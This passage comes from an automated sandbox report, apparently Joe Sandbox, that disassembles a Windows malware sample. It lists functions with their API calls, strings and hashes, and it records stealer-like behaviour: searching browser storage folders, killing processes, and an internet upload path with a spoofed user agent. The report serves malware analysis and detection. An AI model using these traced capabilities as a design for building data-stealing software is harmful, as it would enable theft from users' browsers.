                                                                                                                                                                                              • Part of subcall function 0021C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0021C0F7
                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000,2226158375018974002), ref: 0020629D
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3_catch_InternetOpen
                                                                                                                                                                                            • String ID: 13697246453241158521$2226158375018974002$3933506600908304605$789593363246702628$Kernel32.dll$Wininet.dll
                                                                                                                                                                                            • API String ID: 1967328160-2221855235
                                                                                                                                                                                            • Opcode ID: c54c5dcdf34229d6b1c5b812e5e370d8b50a7f1b50f301c6d61dfdc98e839add
                                                                                                                                                                                            • Instruction ID: 0f14e6a3a3ece7d2cc2fbe16d555caf7e0c78b63cc80c5beda398131247f61ff
                                                                                                                                                                                            • Opcode Fuzzy Hash: c54c5dcdf34229d6b1c5b812e5e370d8b50a7f1b50f301c6d61dfdc98e839add
                                                                                                                                                                                            • Instruction Fuzzy Hash: AC219170E61388FFCB40FFBC8A4669D7EE5AF56300F544099F404A7282C6B40E648BE2
                                                                                                                                                                                            Function 0020C1B8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 224COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0020C1C2
                                                                                                                                                                                              • Part of subcall function 0020C4D0: __EH_prolog3.LIBCMT ref: 0020C4D7
                                                                                                                                                                                              • Part of subcall function 0020CAF1: __EH_prolog3.LIBCMT ref: 0020CAF8
                                                                                                                                                                                              • Part of subcall function 0020CAF1: _Func_class.LIBCONCRT ref: 0020CB97
                                                                                                                                                                                              • Part of subcall function 0020E5D5: __EH_prolog3_GS.LIBCMT ref: 0020E5DF
                                                                                                                                                                                              • Part of subcall function 0020CBA6: __EH_prolog3.LIBCMT ref: 0020CBAD
                                                                                                                                                                                              • Part of subcall function 0020EFDD: __EH_prolog3_GS.LIBCMT ref: 0020EFE7
                                                                                                                                                                                              • Part of subcall function 0020CCE6: __EH_prolog3_GS.LIBCMT ref: 0020CCED
                                                                                                                                                                                              • Part of subcall function 00205F62: ___std_exception_destroy.LIBVCRUNTIME ref: 00205FA5
                                                                                                                                                                                              • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3$Func_class___std_exception_destroy
                                                                                                                                                                                            • String ID: value
                                                                                                                                                                                            • API String ID: 367360030-494360628
                                                                                                                                                                                            • Opcode ID: fd1578445fb30e1f79a9bf21708f57eeed489eeef3ae80840d112bc89acbefa5
                                                                                                                                                                                            • Instruction ID: b684c2133d69093c53255f6b23b5399ef420bc9aab40ab0f6967d6d6523a22ef
                                                                                                                                                                                            • Opcode Fuzzy Hash: fd1578445fb30e1f79a9bf21708f57eeed489eeef3ae80840d112bc89acbefa5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4791ABB0911348DEDB14EB64C945BEEBBB4AF15300F5441E9E149A72C3EB701B58CF62
                                                                                                                                                                                            Function 0020B558 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0020B562
                                                                                                                                                                                              • Part of subcall function 0020B07F: __EH_prolog3_GS.LIBCMT ref: 0020B086
                                                                                                                                                                                              • Part of subcall function 0020C4D0: __EH_prolog3.LIBCMT ref: 0020C4D7
                                                                                                                                                                                              • Part of subcall function 0020E0D4: __EH_prolog3.LIBCMT ref: 0020E0DB
                                                                                                                                                                                              • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E12D
                                                                                                                                                                                              • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E17F
                                                                                                                                                                                              • Part of subcall function 0020E0D4: _Func_class.LIBCONCRT ref: 0020E192
                                                                                                                                                                                              • Part of subcall function 0020C1B8: __EH_prolog3_GS.LIBCMT ref: 0020C1C2
                                                                                                                                                                                              • Part of subcall function 0020C0C7: _Func_class.LIBCONCRT ref: 0020C10A
                                                                                                                                                                                            • _Func_class.LIBCONCRT ref: 0020B607
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Func_class$H_prolog3$H_prolog3_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3328072954-0
                                                                                                                                                                                            • Opcode ID: afa8c564a665f066ea7d2d0cfb78c5ba5fee247a00a1ba8b3c3234793c9637d4
                                                                                                                                                                                            • Instruction ID: 0bfc70413a2157ec8d2bf9c1355bbac5ace8558930db9878a5e2ffe2f48cdfc5
                                                                                                                                                                                            • Opcode Fuzzy Hash: afa8c564a665f066ea7d2d0cfb78c5ba5fee247a00a1ba8b3c3234793c9637d4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 87214970C16289EADF05EBA8C9116DDBFB0AF15304F548099E84877392C6755B44CFA2
                                                                                                                                                                                            Function 002302FE Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 423 2302fe-230307 424 230336-230337 423->424 425 230309-23031c RtlFreeHeap 423->425 425->424 426 23031e-230335 GetLastError call 224e16 call 224eb3 425->426 426->424
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00237B16,?,00000000,?,?,00237DB7,?,00000007,?,?,0023836C,?,?), ref: 00230314
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00237B16,?,00000000,?,?,00237DB7,?,00000007,?,?,0023836C,?,?), ref: 0023031F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                            • Opcode ID: c0806a505f27b12cbcaacfab546444003b1c1adfb903e7d25b8228b6ef92ed3a
                                                                                                                                                                                            • Instruction ID: 61b76dff7fcaf842f716cfe2aeabdcb22b3d3ba1e3d561995c819d02b9aea74c
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0806a505f27b12cbcaacfab546444003b1c1adfb903e7d25b8228b6ef92ed3a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85E08C72950214ABDB312FA0BC5DB9A3BA8BB41791F1540A4F60886160DB708C60CBE4
                                                                                                                                                                                            Function 00217870 Relevance: 1.7, APIs: 1, Instructions: 155COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 458 217870-2178b0 call 23fcd0 461 217985-21798a call 23fc35 458->461 462 2178b6-2178b8 458->462 463 21798d-217996 462->463 464 2178be-2178d3 462->464 469 217998-2179c6 call 2206e0 * 2 463->469 470 217a0e-217a2a call 2206e0 463->470 466 2178d9-2178f6 464->466 467 217a6a-217a86 call 20b2c0 call 20b06b call 2202fe 464->467 473 217907-21790b call 20fa93 466->473 474 2178f8-217904 466->474 481 217a31-217a42 call 2206e0 469->481 470->481 482 217910-217932 call 2206e0 473->482 474->473 481->461 491 217934-217936 482->491 492 217949-21796c call 2206e0 * 2 482->492 491->492 494 217938-217947 call 2206e0 491->494 500 21796f-217980 call 2100c0 492->500 494->500 500->461
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3886170330-0
                                                                                                                                                                                            • Opcode ID: b036f6746d0e1c82626c4f114b3df0fa5c1c19bc7d6e800a26c49e281cee36b2
                                                                                                                                                                                            • Instruction ID: 18bbf90c960dbe99801b253601e74b949c8f23723a655d1cd7950913fb7dc368
                                                                                                                                                                                            • Opcode Fuzzy Hash: b036f6746d0e1c82626c4f114b3df0fa5c1c19bc7d6e800a26c49e281cee36b2
                                                                                                                                                                                            • Instruction Fuzzy Hash: A6513A71E10219AFCF14DFA8D9859EEBBB5BF88310F104229E914B3351D6319AA0CFA0
                                                                                                                                                                                            Function 002202FE Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 503 2202fe-220316 504 220345-220367 KiUserExceptionDispatcher 503->504 505 220318-22031b 503->505 506 22033b-22033e 505->506 507 22031d-220339 505->507 506->504 508 220340 506->508 507->504 507->506 508->504
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00205BD8,?,?,?,?,00205BD8,?,00257E08), ref: 0022035E
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                            • Opcode ID: cd118faf9d22352e6473317f993e11ee67bc7782754baf20cef1f29cc872c9ce
                                                                                                                                                                                            • Instruction ID: 3ea83babc91a43f18904e47db158dc935906bf39365502847f34b1fad2180b51
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd118faf9d22352e6473317f993e11ee67bc7782754baf20cef1f29cc872c9ce
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F01A276900219AFCB01DF9CE884B9EBBB9FF45700F154099E919AB392D770ED01CB90
                                                                                                                                                                                            Function 0023188C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 511 23188c-231898 512 2318ca-2318d5 call 224eb3 511->512 513 23189a-23189c 511->513 520 2318d7-2318d9 512->520 515 2318b5-2318c6 RtlAllocateHeap 513->515 516 23189e-23189f 513->516 517 2318a1-2318a8 call 22e871 515->517 518 2318c8 515->518 516->515 517->512 523 2318aa-2318b3 call 22bd82 517->523 518->520 523->512 523->515
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,002014D8,00000000,?), ref: 002318BE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                            • Opcode ID: 00f446159827607dcc1aa0fad53667bc592d4143894aac9c06aa2531f2961f1e
                                                                                                                                                                                            • Instruction ID: 2207bad51cea38cb51fbf3fde272c0dae2f3a1bb5907ea6f75f0c10c62c8e43b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 00f446159827607dcc1aa0fad53667bc592d4143894aac9c06aa2531f2961f1e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0E561536222A7FB212A65AC05B9A7788AF023A1F110120AD05961D0DBA4CC3045ED

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00207A82 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 222fileCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00207A8C
                                                                                                                                                                                              • Part of subcall function 0020B4BA: __EH_prolog3.LIBCMT ref: 0020B4C1
                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,0000035C,00208101,?,\storage\default\,?), ref: 00207AE0
                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000,?), ref: 00207B91
                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00207C9B
                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,?,?,?), ref: 00207D09
                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 00207D14
                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00207D46
                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00207D5C
                                                                                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?), ref: 00207D68
                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00207DB7
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Find$CloseFile$FirstNext$H_prolog3H_prolog3_MatchPathSpec
                                                                                                                                                                                            • String ID: \idb\
                                                                                                                                                                                            • API String ID: 757186195-120003160
                                                                                                                                                                                            • Opcode ID: ab6fc9e8942fd13406a6fa3455190a90548b267bb306a9b278d6cc575b1aac18
                                                                                                                                                                                            • Instruction ID: 0662d83d86bb3e1202480f21113ca8dc821287ed27015d094ddfb2758d56373b
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab6fc9e8942fd13406a6fa3455190a90548b267bb306a9b278d6cc575b1aac18
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BA1543082035ACBDB25EFA0C998BEDBBB4AF15304F5441A9E419A31D2DB706E99CF51
                                                                                                                                                                                            Function 0021AFE8 Relevance: 13.6, APIs: 9, Instructions: 83sleepprocessCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0021AFF2
                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000268,00209C15,?,?,0024F604), ref: 0021B004
                                                                                                                                                                                            • Process32FirstW.KERNEL32 ref: 0021B022
                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?,?,?), ref: 0021B0BE
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0021B0CD
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0021B0D4
                                                                                                                                                                                            • Process32NextW.KERNEL32(?,0000022C), ref: 0021B0E7
                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0021B101
                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 0021B10C
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseHandleProcessProcess32$CreateFirstH_prolog3_NextOpenSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 271363041-0
                                                                                                                                                                                            • Opcode ID: 8200f704f4b117c7a14a8dd6b7e763c6075fa4f129d2980b3cb9b8b9042177fa
                                                                                                                                                                                            • Instruction ID: cbb0a37f8dc10ae0e5e602cc21bb92e5db3a0446d2b1594f260ff63e722a3bda
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8200f704f4b117c7a14a8dd6b7e763c6075fa4f129d2980b3cb9b8b9042177fa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A31787191122ADBCB31AF20DD4DBEAB7B4BB29304F104194E519A6190EB715ED4CF61
                                                                                                                                                                                            Function 002187FB Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 723memorysleepCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00218805
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020E19F: __EH_prolog3.LIBCMT ref: 0020E1A6
                                                                                                                                                                                              • Part of subcall function 0020A2AA: __EH_prolog3.LIBCMT ref: 0020A2B1
                                                                                                                                                                                              • Part of subcall function 00219206: __EH_prolog3_GS.LIBCMT ref: 00219210
                                                                                                                                                                                              • Part of subcall function 00219C00: __EH_prolog3_catch.LIBCMT ref: 00219C07
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0024F49C,?,?,?), ref: 00218FAF
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00218FB6
                                                                                                                                                                                              • Part of subcall function 0020A568: __EH_prolog3_GS.LIBCMT ref: 0020A56F
                                                                                                                                                                                              • Part of subcall function 00206308: __EH_prolog3_GS.LIBCMT ref: 00206312
                                                                                                                                                                                              • Part of subcall function 00206308: GetTempPathA.KERNEL32(00000104,?,0000013C), ref: 0020632A
                                                                                                                                                                                              • Part of subcall function 00216884: __EH_prolog3.LIBCMT ref: 0021688B
                                                                                                                                                                                              • Part of subcall function 00206671: __EH_prolog3_GS.LIBCMT ref: 0020667B
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,0024F3A0), ref: 002190F3
                                                                                                                                                                                              • Part of subcall function 00206671: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00206893
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • (, xrefs: 0021914D
                                                                                                                                                                                            • /Up/, xrefs: 0021909B, 00219113
                                                                                                                                                                                            • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 00219002
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3$Heap$DebugFreeH_prolog3_catchOutputPathProcessSleepStringTemp
                                                                                                                                                                                            • String ID: ($/Up/$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                            • API String ID: 3833634691-864039517
                                                                                                                                                                                            • Opcode ID: 16eb36333b2101133628b24668ad07912f918cd3d95c86761a8113da15527184
                                                                                                                                                                                            • Instruction ID: 500869e14c09cd95a05debed312d66218e8ff04b1e36d5b0e338be3f7ee5e268
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16eb36333b2101133628b24668ad07912f918cd3d95c86761a8113da15527184
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73529B31D24358EADB15EBA8C899BDDBBB4AF25300F5040E9A145A71D2DF701F98CF62
                                                                                                                                                                                            Function 0023C03A Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                            • Opcode ID: dcbb5d2d6266d6cabb3ef95914c192579cd8e7f784bdcf86f03cdac8ae91e5ca
                                                                                                                                                                                            • Instruction ID: 19c9ec00f875323a1dc1002f1a28afa467323b7be7cec7cfed3c3180555fdfb9
                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbb5d2d6266d6cabb3ef95914c192579cd8e7f784bdcf86f03cdac8ae91e5ca
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BD24BB1E282298FDB65CE28DD407EAB7B5EB44304F2441EAD84DF7240D774AE958F41
                                                                                                                                                                                            Function 002393A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,002396BB,00000002,00000000,?,?,?,002396BB,?,00000000), ref: 00239442
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,002396BB,00000002,00000000,?,?,?,002396BB,?,00000000), ref: 0023946B
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,002396BB,?,00000000), ref: 00239480
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
